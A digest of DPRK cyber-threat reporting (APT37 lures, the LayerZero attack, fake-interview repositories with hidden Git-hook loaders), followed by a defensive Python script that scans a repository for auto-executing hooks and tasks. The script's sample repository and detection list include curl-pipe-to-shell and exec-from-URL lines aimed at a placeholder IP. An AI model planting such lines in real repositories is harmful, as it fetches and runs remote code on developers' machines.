Genians links this campaign to suspected APT37 activity, describing spearphishing emails that deliver ZIP archives containing malicious LNK files. The lures include airline e-tickets, North Korea research event invitations, and impersonation of defense or…
LayerZero said the Lazarus Group attacked internal RPCs used by the LayerZero Labs DVN and poisoned their source of truth while an external RPC provider was simultaneously DDoS’d. The protocol itself was described as unaffected, but the incident impacted …
CSIS argues that North Korean cyber operations, alongside activity from China and Russia, are creating a transnational threat environment that current U.S.-ROK cyber cooperation is not yet structured to deter or withstand. The core recommendation is a joi…
Nisos links DPRK IT worker employment fraud to active targeting of cryptocurrency companies, using a suspected operative who applied for a remote Lead AI Architect role as a case study. The investigation tied the applicant to stolen or appropriated U.S. i…
The episode follows a DPRK-linked fake interview in which a malicious contractor-style repository behaved like normal development work until it contacted attacker infrastructure. The lure depended on developer trust in workspaces, dependency installation,…
Red Asgard ties the Hetzner host at 195.201.104.53 to more than BeaverTail FTP exfiltration, showing it also exposed six Express.js services on non-standard ports. Port 21 ran FileZilla Server 1.12.1 with TLS session resumption enforced and held seventy v…
Two U.S. nationals helped DPRK remote IT workers pose as U.S.-based employees by receiving company laptops, hosting them at their residences, and installing remote desktop software for overseas co-conspirators. The Justice Department said the separate sch…
Attackers exploited LayerZero Labs infrastructure on 18 April 2026, causing more than $300 million in losses across DeFi protocols and prompting two additional forged transactions totaling over $100 million before Kelp paused contracts. The excerpt says i…
ScarCruft compromised a Yanbian-focused gaming platform in a supply-chain attack aimed at ethnic Koreans in China's Yanbian region, an area linked to North Korean refugees and defectors. The Windows client was affected through a malicious update that led …
OpenSourceMalware reports that DPRK Contagious Interview and TaskJacker operators are hiding a second-stage loader inside Git pre-commit hooks instead of prior locations such as VS Code tasks, package postinstall scripts, or fake font files. The hook fing…
Aave LLC’s court filing seeks to vacate a restraining notice served on Arbitrum DAO in litigation involving plaintiffs against the Democratic People’s Republic of Korea. The memorandum says the restrained assets relate to the rsETH Incident and the April …
A five-package npm cluster used Cloudflare Pages and Workers infrastructure to deliver PylangGhost RAT. The packages shared related maintainer names, email patterns, publish timing, and dependency links, leading the source to assess they were likely opera…
Plausible Deniability pivots from Team Cymru's reporting on DPRK IT worker infrastructure to identify a possible related Luckyguys cluster centered on luckyguys[.]cloud. The domain was registered close to luckyguys[.]site through the same registrar, hoste…
DomainTools characterizes DPRK Contagious Interview activity as a Lazarus developer-workflow compromise model that turns fake recruiting and coding assessments into initial access. Victims are pushed to clone and run repositories that hide malicious logic…
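The pre-commit hook item and the DomainTools developer-workflow item above both come down to the same question a candidate or reviewer should answer before running a handed-over repository: what in it executes on its own? The script below is an added example, not code from OpenSourceMalware, DomainTools or any of the cited reports. It walks the locations those items name (Git hooks, npm lifecycle scripts, VS Code tasks that start on folder open) and flags contents that have no place in a take-home task. The indicator list, the hook-location logic (including the `core.hooksPath` and `.husky/` handling) and the sample repository it builds in a temp directory are all assumptions made for the example; the 203.0.113.10 address is a documentation-range placeholder, not an indicator from any report.

```python
"""Audit an unpacked or cloned repository for auto-executing locations used by
fake-interview lures. Added example; indicator list is a heuristic starting point."""
import json
import re
import tempfile
from pathlib import Path

# Patterns that do not belong in a coding-assessment repo's hooks or install
# scripts (assumed indicator set for this example, not from the cited reports).
SUSPICIOUS = [
    r"curl\s", r"wget\s", r"base64", r"\beval\b", r"bash\s+-c", r"sh\s+-c",
    r"python3?\s+-c", r"powershell", r"Invoke-Expression", r"child_process",
    r"https?://\d{1,3}(?:\.\d{1,3}){3}",  # URL with a raw IP instead of a hostname
]
# npm runs these during `npm install` with no prompt, whatever they contain.
NPM_LIFECYCLE = ("preinstall", "install", "postinstall", "prepare", "prepublish")


def indicators(text):
    """Return the SUSPICIOUS patterns that match anywhere in text."""
    return sorted(p for p in SUSPICIOUS if re.search(p, text, re.IGNORECASE))


def hook_dirs(repo):
    """Directories Git may execute hooks from. .git/hooks is not transferred by a
    normal clone but does arrive inside ZIP/tarball hand-offs; core.hooksPath and
    .husky/ let a tracked directory serve as the hook source after a clone."""
    dirs = [repo / ".git" / "hooks", repo / ".husky"]
    cfg = repo / ".git" / "config"
    if cfg.is_file():
        m = re.search(r"^\s*hooksPath\s*=\s*(\S+)", cfg.read_text(), re.M | re.I)
        if m:
            dirs.append(repo / m.group(1))
    return [d for d in dirs if d.is_dir()]


def _read_json(path):
    try:
        return json.loads(path.read_text())
    except ValueError:  # VS Code tolerates comments in tasks.json; plain json does not
        return {}


def audit_repo(repo):
    """Return [{'location': ..., 'indicators': [...]}] for each auto-executing
    location with a suspicious pattern; npm lifecycle scripts are reported even
    when clean, because they run on install regardless of content."""
    repo = Path(repo)
    findings = []
    for d in hook_dirs(repo):
        for f in sorted(d.iterdir()):
            if f.is_file() and not f.name.endswith(".sample"):
                hits = indicators(f.read_text(errors="replace"))
                if hits:
                    findings.append({"location": f.relative_to(repo).as_posix(),
                                     "indicators": hits})
    pkg = repo / "package.json"
    scripts = _read_json(pkg).get("scripts", {}) if pkg.is_file() else {}
    for name in NPM_LIFECYCLE:
        if name in scripts:
            findings.append({"location": f"package.json:scripts.{name}",
                             "indicators": indicators(scripts[name]) or ["lifecycle-script"]})
    tasks_file = repo / ".vscode" / "tasks.json"
    if tasks_file.is_file():
        for task in _read_json(tasks_file).get("tasks", []):
            if task.get("runOptions", {}).get("runOn") == "folderOpen":
                findings.append({"location": f".vscode/tasks.json:{task.get('label')}",
                                 "indicators": ["runOn=folderOpen"] + indicators(json.dumps(task))})
    return findings


def build_sample_repo():
    """Constructed lookalike of a 'coding assessment' hand-off (not a real sample)."""
    repo = Path(tempfile.mkdtemp())
    files = {
        ".git/config": "[core]\n\trepositoryformatversion = 0\n\thooksPath = .hooks\n",
        ".git/hooks/pre-commit": "#!/bin/sh\ncurl -s http://203.0.113.10/p | base64 -d | sh\n",
        ".hooks/pre-push": "#!/bin/sh\npython3 -c 'import urllib.request as u; "
                           "exec(u.urlopen(\"http://203.0.113.10/s\").read())'\n",
        "package.json": json.dumps({"name": "take-home-task", "scripts": {
            "postinstall": "node scripts/setup.js", "test": "jest"}}),
        ".vscode/tasks.json": json.dumps({"version": "2.0.0", "tasks": [{
            "label": "build", "type": "shell",
            "command": "bash -c 'curl http://203.0.113.10/a | sh'",
            "runOptions": {"runOn": "folderOpen"}}]}),
        "src/index.js": "console.log('hello');\n",
    }
    for rel, content in files.items():
        p = repo / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)
    return repo


if __name__ == "__main__":
    for finding in audit_repo(build_sample_repo()):
        print(f"{finding['location']}: {', '.join(finding['indicators'])}")
```

Run it against any repository path before `npm install`, before opening the folder in an editor, and before the first commit; a clean take-home task should produce an empty list. The hook scan deliberately covers every hook file rather than only `pre-commit`, since the location has already moved several times.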